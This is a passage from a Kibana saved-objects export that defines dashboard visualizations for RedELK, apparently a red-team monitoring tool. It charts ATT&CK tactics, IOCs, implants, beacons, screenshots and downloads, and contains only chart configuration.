Techniques\"}"}, "coreMigrationVersion": "7.16.2", "id": "231792d0-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2223], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - MITRE ATT&CK Tactics", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-6h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"group\",\"params\":{\"field\":\"signal.rule.threat.tactic.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Count\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Count\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - MITRE ATT&CK Tactics\"}"}, "coreMigrationVersion": "7.16.2", "id": "2f5a2760-d050-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "dddbba20-d04f-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2225], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IP Lists donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - IP Lists donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.source\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"iplist.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":30,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "2f77a150-926a-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "87530b40-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2227], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Modules results donut", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - Modules results donut\",\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"params\":{},\"schema\":\"metric\"},{\"id\":\"4\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":5,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"split\"},{\"id\":\"3\",\"enabled\":true,\"type\":\"terms\",\"params\":{\"field\":\"module.last_run.status\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Module type\"},\"schema\":\"segment\"}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"bottom\",\"isDonut\":true,\"labels\":{\"show\":true,\"values\":true,\"last_level\":true,\"truncate\":100},\"row\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true}}"}, "coreMigrationVersion": "7.16.2", "id": "2f971ac0-926b-11eb-a753-9da683898c26", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "654f76a0-9269-11eb-a753-9da683898c26", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2229], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC Types tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"ioc.type\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":10,\"otherBucket\":false,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"IOC Types\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":true,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - IOC Types tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "3729cde0-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2231], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Screenshots\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Screenshots total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "389dddc0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2233], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-30h\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\"},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Alarmed IOC\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Alarmed IOC\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - Alarmed IOC over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "3ae6c0c0-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2235], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":20,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\",\"customLabel\":\"Downloads\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Downloads per user tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "41f94ad0-d04c-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2237], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "title": "RedELK - Dashboard links external", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"markdown\",\"aggs\":[],\"params\":{\"fontSize\":12,\"markdown\":\"**External tools** : [MITRE ATT&CK Navigator](/attack-navigator/) | [Jupyter Notebook](/jupyter/) | [Neo4j Browser](/neo4jbrowser/) \",\"openLinksInNewTab\":true},\"title\":\"RedELK - Dashboard links external\"}"}, "coreMigrationVersion": "7.16.2", "id": "45491770-0886-11eb-a2d2-171dc8941414", "migrationVersion": {"visualization": "7.14.0"}, "references": [], "sort": [1642152856829, 2238], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - TTP Techniques unique count total ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"threat.technique.id\",\"customLabel\":\"MITRE ATT&CK Techniques\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - TTP Techniques unique count total \"}"}, "coreMigrationVersion": "7.16.2", "id": "464660c0-d360-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "cc523820-d021-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2240], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "title": "RedELK - HTTP Redir filters", "uiStateJSON": "{}", "version": 1, "visState": "{\"title\":\"RedELK - HTTP Redir filters\",\"type\":\"input_control_vis\",\"aggs\":[],\"params\":{\"controls\":[{\"id\":\"1627506187584\",\"fieldName\":\"redir.backend.name\",\"parent\":\"\",\"label\":\"Backend\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_0_index_pattern\"},{\"id\":\"1627507362404\",\"fieldName\":\"source.as.organization.name\",\"parent\":\"\",\"label\":\"ASN\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_1_index_pattern\"},{\"id\":\"1627507398459\",\"fieldName\":\"source.geo.country_iso_code\",\"parent\":\"\",\"label\":\"Country\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_2_index_pattern\"},{\"id\":\"1627507415074\",\"fieldName\":\"tags\",\"parent\":\"\",\"label\":\"Tags\",\"type\":\"list\",\"options\":{\"type\":\"terms\",\"multiselect\":true,\"dynamicOptions\":true,\"size\":5,\"order\":\"desc\"},\"indexPatternRefName\":\"control_3_index_pattern\"}],\"updateFiltersOnChange\":true,\"useTimeFilter\":true,\"pinFilters\":false}}"}, "coreMigrationVersion": "7.16.2", "id": "56350050-efe7-11eb-8a9f-2572da287875", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "redirtraffic", "name": "control_0_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_1_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_2_index_pattern", "type": "index-pattern"}, {"id": "redirtraffic", "name": "control_3_index_pattern", "type": "index-pattern"}], "sort": [1642152856829, 2245], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Implants total count ", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Implants\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Implants total count \"}"}, "coreMigrationVersion": "7.16.2", "id": "57626ad0-d355-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2247], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - IOC total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "5ffe8850-d4e4-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "4c003e20-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2249], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Redirector traffic alarmed IP total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"cardinality\",\"schema\":\"metric\",\"params\":{\"field\":\"source.ip\",\"customLabel\":\"Alarmed IP\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Redirector traffic alarmed IP total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "62b61920-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "658d7180-d4e1-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2251], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per host", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"host.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per host\"}"}, "coreMigrationVersion": "7.16.2", "id": "632081a0-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2253], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Screenshots per user tag cloud", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"tagcloud\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":100,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"scale\":\"linear\",\"orientation\":\"single\",\"minFontSize\":18,\"maxFontSize\":72,\"showLabel\":false,\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"}},\"title\":\"RedELK - Screenshots per user tag cloud\"}"}, "coreMigrationVersion": "7.16.2", "id": "659280b0-d317-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "e8de79f0-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2255], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"language\":\"kuery\",\"query\":\"\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Beacons per user", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{}},{\"id\":\"2\",\"enabled\":true,\"type\":\"terms\",\"schema\":\"segment\",\"params\":{\"field\":\"user.name\",\"orderBy\":\"1\",\"order\":\"desc\",\"size\":999,\"otherBucket\":true,\"otherBucketLabel\":\"Other\",\"missingBucket\":false,\"missingBucketLabel\":\"Missing\"}}],\"params\":{\"type\":\"pie\",\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"isDonut\":true,\"labels\":{\"show\":false,\"values\":true,\"last_level\":true,\"truncate\":100},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"distinctColors\":true},\"title\":\"RedELK - Beacons per user\"}"}, "coreMigrationVersion": "7.16.2", "id": "6fcf1e70-d02a-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "68e8e870-b6aa-11e8-bc1a-cf8fa3255855", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2257], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Alarmed IOC total count", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"metric\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Alarmed IOC\"}}],\"params\":{\"addTooltip\":true,\"addLegend\":false,\"type\":\"metric\",\"metric\":{\"percentageMode\":false,\"useRanges\":false,\"colorSchema\":\"Green to Red\",\"metricColorMode\":\"None\",\"colorsRange\":[{\"from\":0,\"to\":10000}],\"labels\":{\"show\":true},\"invertColors\":false,\"style\":{\"bgFill\":\"#000\",\"bgColor\":false,\"labelColor\":false,\"subText\":\"\",\"fontSize\":60}}},\"title\":\"RedELK - Alarmed IOC total count\"}"}, "coreMigrationVersion": "7.16.2", "id": "7d850b30-d4e2-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "10da2290-d4e2-11ea-9301-a30a04251ae9", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2259], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"kuery\"},\"filter\":[]}"}, "savedSearchRefName": "search_0", "title": "RedELK - Downloads over time", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"histogram\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Downloads\"}},{\"id\":\"2\",\"enabled\":true,\"type\":\"date_histogram\",\"schema\":\"segment\",\"params\":{\"field\":\"@timestamp\",\"timeRange\":{\"from\":\"now-4w\",\"to\":\"now\"},\"useNormalizedEsInterval\":true,\"scaleMetricValues\":false,\"interval\":\"auto\",\"drop_partials\":false,\"min_doc_count\":1,\"extended_bounds\":{}}}],\"params\":{\"type\":\"histogram\",\"grid\":{\"categoryLines\":false},\"categoryAxes\":[{\"id\":\"CategoryAxis-1\",\"type\":\"category\",\"position\":\"bottom\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\"},\"labels\":{\"show\":true,\"filter\":true,\"truncate\":100},\"title\":{}}],\"valueAxes\":[{\"id\":\"ValueAxis-1\",\"name\":\"LeftAxis-1\",\"type\":\"value\",\"position\":\"left\",\"show\":true,\"style\":{},\"scale\":{\"type\":\"linear\",\"mode\":\"normal\",\"defaultYExtents\":false,\"setYExtents\":false},\"labels\":{\"show\":true,\"rotate\":0,\"filter\":false,\"truncate\":100},\"title\":{\"text\":\"Downloads\"}}],\"seriesParams\":[{\"show\":true,\"type\":\"histogram\",\"mode\":\"stacked\",\"data\":{\"label\":\"Downloads\",\"id\":\"1\"},\"valueAxis\":\"ValueAxis-1\",\"drawLinesBetweenPoints\":true,\"lineWidth\":2,\"showCircles\":true,\"circlesRadius\":1}],\"addTooltip\":true,\"addLegend\":true,\"legendPosition\":\"right\",\"times\":[],\"addTimeMarker\":false,\"labels\":{\"show\":false},\"thresholdLine\":{\"show\":false,\"value\":10,\"width\":1,\"style\":\"full\",\"color\":\"#E7664C\"},\"palette\":{\"type\":\"palette\",\"name\":\"kibana_palette\"},\"isVislibVis\":true,\"detailedTooltip\":true},\"title\":\"RedELK - CS - Downloads over time\"}"}, "coreMigrationVersion": "7.16.2", "id": "85446c80-d04b-11ea-9301-a30a04251ae9", "migrationVersion": {"visualization": "7.14.0"}, "references": [{"id": "26ba4cb0-0f73-11e9-8e1e-a16db980e11e", "name": "search_0", "type": "search"}], "sort": [1642152856829, 2261], "type": "visualization", "version": "1"} -{"attributes": {"description": "", "kibanaSavedObjectMeta": {"searchSourceJSON": "{\"query\":{\"query\":\"\",\"language\":\"lucene\"},\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.index\",\"filter\":[{\"$state\":{\"store\":\"appState\"},\"meta\":{\"alias\":null,\"disabled\":false,\"key\":\"c2.log.type\",\"negate\":false,\"params\":{\"query\":\"implant_newimplant\"},\"type\":\"phrase\",\"indexRefName\":\"kibanaSavedObjectMeta.searchSourceJSON.filter[0].meta.index\"},\"query\":{\"match_phrase\":{\"c2.log.type\":\"implant_newimplant\"}}}]}"}, "title": "RedELK - Top new implants by ext IP address and scenario", "uiStateJSON": "{}", "version": 1, "visState": "{\"type\":\"pie\",\"aggs\":[{\"id\":\"1\",\"enabled\":true,\"type\":\"count\",\"schema\":\"metric\",\"params\":{\"customLabel\":\"Amount of new 